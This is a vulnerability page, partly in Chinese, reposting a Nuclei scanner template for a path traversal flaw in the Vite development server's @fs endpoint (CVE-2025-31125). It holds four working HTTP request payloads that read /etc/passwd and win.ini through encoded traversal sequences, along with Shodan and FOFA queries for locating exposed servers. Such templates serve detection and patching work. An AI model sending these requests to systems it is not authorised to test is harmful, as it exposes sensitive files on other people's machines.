CVE-2025-31125: Vite Development Server - Path Traversal

日期: 2025-08-01 | 影响软件: Vite Development Server | POC: 已公开

漏洞描述

Path traversal vulnerability in Vite development server's @fs endpoint allows attackers to access files outside the intended directory. When exposed to the network, attackers can exploit this via crafted URLs to access sensitive system files.

PoC代码[已公开]

id: CVE-2025-31125

info:
  name: Vite Development Server - Path Traversal
  author: martian,ritikchaddha,v2htw
  severity: medium
  description: |
    Path traversal vulnerability in Vite development server's @fs endpoint allows attackers to access files outside the intended directory. When exposed to the network, attackers can exploit this via crafted URLs to access sensitive system files.
  remediation: |
    Upgrade to the patched version or avoid exposing the Vite development server to the network (do not use --host flag or configure server.host); if upgrading is not immediately possible, implement access restrictions to the Vite development server
  reference:
    - https://github.com/vitejs/vite/issues/8498
    - https://github.com/vitejs/vite/pull/8804
    - https://github.com/vitejs/vite/pull/8979
    - https://nvd.nist.gov/vuln/detail/CVE-2025-31125
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2025-31125
    epss-score: 0.04103
    epss-percentile: 0.88096
    cwe-id: CWE-200
  metadata:
    verified: true
    max-requests: 4
    shodan-query: title:"Vite App"
    fofa-query: title="Vite App"
  tags: cve,cve2025,vite,lfi,vkev,vuln

http:
  - raw:
      - |
        GET /@fs/C:/windows/win.ini?import&?inline=1.wasm?init HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /@fs/etc/passwd?import&?inline=1.wasm?init HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /@fs/../../../../../../../etc/passwd?import&?inline=1.wasm?init HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /@fs/%252e%252e/%252e%252e/%252e%252e/etc/passwd?import&?inline=1.wasm?init HTTP/1.1
        Host: {{Hostname}}

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "data:application/octet-stream"
          - "base64"
          - "import init"
        condition: and

      - type: word
        part: header
        words:
          - "text/javascript"
# digest: 490a0046304402205fad2c2264aa197c2333d2abf6e23d26c6acbc9a68dc27c16045a1108ca1c9ca022061dfadd3a85e41270e48655800b6ae134afc114f8bb67d6a6ad86dd6791b150a:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-31125.yaml